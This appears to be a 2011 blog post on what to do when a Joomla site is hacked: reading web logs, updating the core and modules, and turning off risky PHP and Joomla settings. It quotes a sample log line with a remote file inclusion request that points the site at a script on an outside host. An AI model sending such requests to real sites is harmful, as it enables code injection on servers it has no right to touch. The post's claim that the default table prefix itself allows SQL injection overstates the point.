What to do when Joomla is hacked?

By | January 3, 2011

When you discover that your Joomla is under attack, you should first go through the  weblogs. You might discover suspicious client requests there for eg:

192.168.0.1 – – [29/Oct/2008:06:07:30 -0500] “GET /index.php?live_site=domain.com/1.txt?? HTTP/1.1” 200 10864 “-” “Firefox”

But there are times when its extremely difficult to trace and decode an attack on your website. It might take the skills and time of an expert developer to successfully trace an attack. Hopefully the below points might prove helpful to prevent any attacks on your Joomla website

1. Check if the Joomla core is updated with the latest version. Older versions are more susceptible to attacks and hacks. To check this, you will have to log into your Joomla admin where the version is clearly specified.

2. Outdated Joomla Add ons/ modules

With the core, also check for any additional modules. If you have  any outdated versions of modules that can create problems with security. You have to keep them updated always. You can easily check on upgrades, security issues on the modules official websites.

3. Security breaches through misconfigurations:

In PHP configuration: check ‘register_globals’ if this is ‘on’ this directive can cause variable poisoning;
Switch this ‘off’

PHP configuration: check ‘- allow_url_include’. If this directive is ‘on’,  it is easy to add remote code to your Joomla script. Turn this off too.

using the default table prefix _jos. This allows MySQL injections. You have to make changes so that your table prefix cannot be easily decoded through this component.

RG_EMULATION turned on in Joomla 1.0.* – this directive emulates register_globals locally. This directive should be disabled. When enabled a warning will be displayed right after you log in to your Joomla admin panel. To disable it, you can add the following somewhere in the middle of the configuration.php file:
if(!defined(‘RG_EMULATION’)) { define( ‘RG_EMULATION’, 0 ); }